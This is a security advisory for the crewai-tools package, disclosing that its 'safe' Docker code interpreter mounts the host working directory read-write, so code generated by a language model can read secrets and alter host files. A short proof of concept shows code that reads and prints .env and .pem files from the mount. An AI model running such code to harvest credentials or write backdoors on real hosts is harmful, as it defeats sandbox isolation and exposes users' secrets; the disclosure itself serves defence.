Community Advisory: Host Filesystem Exposure via Read-Write CWD Mount in crewai-tools Docker Code Interpreter #7249
Description
Advisory Details
- Package ecosystem: pip
- Package name: crewai-tools
- Affected versions: <= 0.36.1
- Patched versions: (none)
- Severity: Medium
- CWE: CWE-269 (Improper Privilege Management)
Summary
The "safe" Docker execution mode in crewai_tools/tools/code_interpreter_tool/code_interpreter_tool.py:271 mounts host CWD as /workspace with mode: "rw". LLM-generated code can read secrets (.env, SSH keys) and write backdoors to host files, defeating the isolation purpose of Docker execution.
Details
The Docker code interpreter tool is intended to provide sandboxed execution of LLM-generated code. However, it mounts the host's current working directory into the container with read-write access:
# code_interpreter_tool.py:271
volumes={os.getcwd(): {"bind": "/workspace", "mode": "rw"}}This means any code executed inside the "sandboxed" Docker container can:
- Read all files in the host CWD including
.env, SSH keys, credentials - Write arbitrary files back to the host filesystem
- Modify existing source code to inject backdoors
PoC
from crewai_tools import CodeInterpreterTool
tool = CodeInterpreterTool(unsafe_mode=False) # "safe" Docker mode
# LLM-generated code reads host secrets
result = tool._run(code="""
import os
for f in os.listdir('/workspace'):
if f.startswith('.env') or f.endswith('.pem'):
with open(f'/workspace/{f}') as fh:
print(f'=== {f} ===')
print(fh.read())
""")Impact
Any application using CrewAI's Docker code interpreter in its default configuration exposes the host working directory to LLM-generated code. This defeats the stated security purpose of Docker isolation and enables data exfiltration and host file manipulation.